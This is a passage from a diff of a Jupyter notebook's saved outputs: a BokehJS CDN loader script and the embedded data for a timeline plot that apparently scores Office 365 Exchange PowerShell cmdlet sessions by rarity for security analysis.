+       "  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.0.2.min.js\"];\n",
+       "  var css_urls = [];\n",
+       "  \n",
+       "\n",
+       "  var inline_js = [\n",
+       "    function(Bokeh) {\n",
+       "      Bokeh.set_log_level(\"info\");\n",
+       "    },\n",
+       "    function(Bokeh) {\n",
+       "    \n",
+       "    \n",
+       "    }\n",
+       "  ];\n",
+       "\n",
+       "  function run_inline_js() {\n",
+       "    \n",
+       "    if (root.Bokeh !== undefined || force === true) {\n",
+       "      \n",
+       "    for (var i = 0; i < inline_js.length; i++) {\n",
+       "      inline_js[i].call(root, root.Bokeh);\n",
+       "    }\n",
+       "    if (force === true) {\n",
+       "        display_loaded();\n",
+       "      }} else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(run_inline_js, 100);\n",
+       "    } else if (!root._bokeh_failed_load) {\n",
+       "      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n",
+       "      root._bokeh_failed_load = true;\n",
+       "    } else if (force !== true) {\n",
+       "      var cell = $(document.getElementById(\"1651\")).parents('.cell').data().cell;\n",
+       "      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n",
+       "    }\n",
+       "\n",
+       "  }\n",
+       "\n",
+       "  if (root._bokeh_is_loading === 0) {\n",
+       "    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n",
+       "    run_inline_js();\n",
+       "  } else {\n",
+       "    load_libs(css_urls, js_urls, function() {\n",
+       "      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n",
+       "      run_inline_js();\n",
+       "    });\n",
+       "  }\n",
+       "}(window));"
+      ],
+      "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  \n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1651\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error() {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (var i = 0; i < css_urls.length; i++) {\n      var url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.0.2.min.js\": \"ufR9RFnRs6lniiaFvtJziE0YeidtAgBRH6ux2oUItHw5WTvE1zuk9uzhUU/FJXDp\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.0.2.min.js\": \"8QM/PGWBT+IssZuRcDcjzwIh1mkOmJSoNMmyYDZbCfXJg3Ap1lEvdVgFuSAwhb/J\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.0.2.min.js\": \"Jm8cH3Rg0P6UeZhVY5cLy1WzKajUT9KImCY+76hEqrcJt59/d8GPvFHjCkYgnSIn\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.0.2.min.js\": \"Ozhzj+SI7ywm74aOI/UajcWz+C0NjsPunEVyVIrxzYkB+jA+2tUw8x5xJCbVtK5I\"};\n\n    for (var i = 0; i < js_urls.length; i++) {\n      var url = js_urls[i];\n      var element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.0.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1651\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"47580148-48b0-4fdd-9d42-43b533dc97ec\" data-root-id=\"1723\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "(function(root) {\n",
+       "  function embed_document(root) {\n",
+       "    \n",
+       "  var docs_json = {\"25130edf-7ac9-4213-a127-78d1f99a8114\":{\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"1653\"},{\"id\":\"1693\"}]},\"id\":\"1723\",\"type\":\"Column\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1751\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1755\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"text\":\"Timeline\"},\"id\":\"1654\",\"type\":\"Title\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1730\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1750\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"1658\",\"type\":\"DataRange1d\"},{\"attributes\":{\"end\":1591144831400.0,\"start\":1585119014600.0},\"id\":\"1656\",\"type\":\"Range1d\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1731\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1733\",\"type\":\"DaysTicker\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1676\",\"type\":\"PanTool\"},{\"attributes\":{},\"id\":\"1756\",\"type\":\"YearsTicker\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":{\"id\":\"1718\"},\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1718\"}]},\"id\":\"1708\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"1674\",\"type\":\"ResetTool\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1732\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":null,\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1652\"},{\"id\":\"1672\"},{\"id\":\"1673\"},{\"id\":\"1674\"},{\"id\":\"1675\"},{\"id\":\"1676\"}]},\"id\":\"1678\",\"type\":\"Toolbar\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1754\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1737\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1675\",\"type\":\"SaveTool\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1738\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1672\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1734\",\"type\":\"DaysTicker\"},{\"attributes\":{\"below\":[{\"id\":\"1704\"},{\"id\":\"1709\"}],\"center\":[{\"id\":\"1707\"}],\"plot_height\":120,\"plot_width\":900,\"renderers\":[{\"id\":\"1716\"}],\"title\":{\"id\":\"1694\"},\"toolbar\":{\"id\":\"1708\"},\"toolbar_location\":null,\"x_range\":{\"id\":\"1696\"},\"x_scale\":{\"id\":\"1700\"},\"y_range\":{\"id\":\"1698\"},\"y_scale\":{\"id\":\"1702\"}},\"id\":\"1693\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1736\",\"type\":\"DaysTicker\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"Tooltip\":\"printf\"},\"tooltips\":[[\"rarest_window3_likelihood\",\"@rarest_window3_likelihood\"],[\"UserId\",\"@UserId\"],[\"rarest_window3\",\"@rarest_window3\"],[\"ClientIP\",\"@ClientIP\"],[\"time_col\",\"@time_col\"]]},\"id\":\"1652\",\"type\":\"HoverTool\"},{\"attributes\":{\"overlay\":{\"id\":\"1677\"}},\"id\":\"1673\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"formatter\":{\"id\":\"1710\"},\"ticker\":{\"id\":\"1705\"}},\"id\":\"1704\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"axis\":{\"id\":\"1668\"},\"dimension\":1,\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"1671\",\"type\":\"Grid\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1740\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1735\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"1741\",\"type\":\"YearsTicker\"},{\"attributes\":{\"below\":[{\"id\":\"1664\"}],\"center\":[{\"id\":\"1667\"},{\"id\":\"1671\"}],\"left\":[{\"id\":\"1668\"}],\"min_border_left\":50,\"plot_height\":300,\"plot_width\":900,\"renderers\":[{\"id\":\"1691\"}],\"title\":{\"id\":\"1654\"},\"toolbar\":{\"id\":\"1678\"},\"toolbar_location\":\"above\",\"x_range\":{\"id\":\"1656\"},\"x_scale\":{\"id\":\"1660\"},\"y_range\":{\"id\":\"1658\"},\"y_scale\":{\"id\":\"1662\"}},\"id\":\"1653\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"axis\":{\"id\":\"1664\"},\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"1667\",\"type\":\"Grid\"},{\"attributes\":{\"axis_label\":\"rarest_window3_likelihood\",\"formatter\":{\"id\":\"1728\"},\"ticker\":{\"id\":\"1669\"}},\"id\":\"1668\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1757\",\"type\":\"Selection\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1739\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"1730\"},{\"id\":\"1731\"},{\"id\":\"1732\"},{\"id\":\"1733\"},{\"id\":\"1734\"},{\"id\":\"1735\"},{\"id\":\"1736\"},{\"id\":\"1737\"},{\"id\":\"1738\"},{\"id\":\"1739\"},{\"id\":\"1740\"},{\"id\":\"1741\"}]},\"id\":\"1665\",\"type\":\"DatetimeTicker\"},{\"attributes\":{},\"id\":\"1758\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"1685\"},\"ticker\":{\"id\":\"1665\"}},\"id\":\"1664\",\"type\":\"DatetimeAxis\"},{\"attributes\":{},\"id\":\"1728\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"1742\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"1743\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"data_source\":{\"id\":\"1687\"},\"glyph\":{\"id\":\"1689\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1690\"},\"selection_glyph\":null,\"view\":{\"id\":\"1692\"}},\"id\":\"1691\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1752\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1685\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{},\"id\":\"1660\",\"type\":\"LinearScale\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"render_mode\":\"css\",\"right_units\":\"screen\",\"top_units\":\"screen\"},\"id\":\"1677\",\"type\":\"BoxAnnotation\"},{\"attributes\":{},\"id\":\"1700\",\"type\":\"LinearScale\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":{\"value\":\"10px\"}},\"id\":\"1709\",\"type\":\"Title\"},{\"attributes\":{\"fill_color\":{\"value\":\"blue\"},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"begin\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1714\",\"type\":\"Circle\"},{\"attributes\":{\"data\":{\"ClientIP\":[\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],\"UserId\":[\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\"],\"begin\":{\"__ndarray__\":\"AAB7LuYSd0IAgEv4dRN3QgAArfmhE3dCAACxObMTd0IAAJ1msxN3QgAAOZ9MFHdCAIBTTMMUd0IAAEOE6RR3QgCApmPqFHdCAADiouoUd0IAAFcCDBV3QgAAt+JhFXdCAIDa9WkVd0IAAHcHqhV3QgCAwYKqFXdCAAAH6qoVd0IAgMq5qxV3QgCA/e+rFXdCAADJjq0Vd0IAAH/ErRV3QgAAv/f9FXdCAIBrOf4Vd0IAAAQl/xV3QgCAtmX/FXdCAADspf8Vd0IAAJxZABZ3QgAAmCoBFndCAAAPJgIWd0IAgNlBvRd3QgCAT5nHF3dCAAATPA4Yd0IAgN+JGRh3QgAA88ZSGHdCAAAi8WIYd0IAgMRRbBh3QgCAWRafGHdCAADW/64Yd0IAAN/6uRh3QgCAsNAFGXdCAABRmVgZd0IAgBwCYxl3QgCAhfj9GXdCAIDXXVoad0IAADzkjxp3QgAAbr2iGndCAIDpYqwad0IAgBrF/xp3QgAAhs9FG3dCAIDarVEbd0IAAOY4mht3QgAAyXH2G3dCAAC8U2ccd0IAAJ/Kjxx3QgCAaNqaHHdCAAAWNNIcd0IAAGd84xx3QgCAPBPtHHdCAABlBP4cd0IAgAKDUh13QgAAPDUsHndCAACV8zced0IAgMvDWx53QgCAojJcHndCAADl0l0ed0IAgNTDeh53QgAAU05+HndCAACyVyQfd0IAgG91LR93QgCAqO51H3dCAACvQxcgd0IAAD6CISB3QgAAKv0OIXdCAIAuHhkhd0IAAPr0ZCF3QgAA2mzBIXdCAAAK1sMhd0IAgMaLzCF3QgCAlD/hIXdCAIBo8vUhd0IAgAN2CSJ3QgCARP0JIndCAIB1UQwid0IAAJoBISJ3QgCAO7I1IndCAABOZUoid0IAgNEaXyJ3QgCAF1BwIndCAIBAyXMid0IAgBU4eyJ3QgCA1PGEIndCAICz848id0IAgIgynyJ3QgAAu2+qIndCAIBu4rMid0IAgE2dtSJ3QgAAwrHFIndCAICtJ8Yid0IAgJubyCJ3QgCAXUbKIndCAIDDBdIid0IAAMjf0iJ3QgAAnBDTIndCAABzf9Mid0IAgFCk0yJ3QgAAk83TIndCAADLF9Qid0IAAF1N1SJ3QgCAdX3VIndCAIDbVGggd0IAgL9qcyB3QgCAk//9IndCAIA9+wcjd0IAAILHTiN3QgCAWwpYI3dCAIBegKIjd0IAAM2/qyN3QgCAnFrzI3dCAADq1/0jd0IAgLCsRiR3QgAAyaZPJHdCAAA3o5kkd0IAgNbFoiR3QgCA7CnsJHdCAIAj1vQkd0IAAN8aPSV3QgAAKzqQJXdCAAAMEpsld0I=\",\"dtype\":\"float64\",\"shape\":[127]},\"color\":[\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\"],\"index\":[0,2,3,5,6,7,8,10,11,12,13,14,16,17,19,21,22,23,24,25,26,27,29,30,31,32,34,36,38,39,41,43,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,62,63,64,65,68,71,73,74,75,76,77,80,87,88,90,91,92,94,96,100,101,105,108,110,124,126,132,140,141,142,146,153,155,156,159,162,168,172,177,182,183,185,187,190,193,195,199,200,207,208,211,216,220,221,222,224,225,226,227,229,230,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251],\"rarest_window3\":[[\"Cmd(name='Remove-MailboxLocation', params={'ErrorAction', 'Identity', 'Confirm'})\",\"Cmd(name='Set-User', params={'ErrorAction', 'Identity', 'SyncMailboxLocationGuids'})\"],[\"Cmd(name='Remove-MailboxLocation', params={'ErrorAction', 'Identity', 'Confirm'})\",\"Cmd(name='Set-User', params={'ErrorAction', 'Identity', 'SyncMailboxLocationGuids'})\"],[\"Cmd(name='Remove-MailboxLocation', params={'ErrorAction', 'Identity', 'Confirm'})\",\"Cmd(name='Remove-MailboxLocation', params={'ErrorAction', 'Identity', 'Confirm'})\",\"Cmd(name='Set-User', params={'ErrorAction', 'Identity', 'SyncMailboxLocationGuids'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='New-ConditionalAccessPolicy', params={'Organization'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='New-ConditionalAccessPolicy', params={'Organization'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 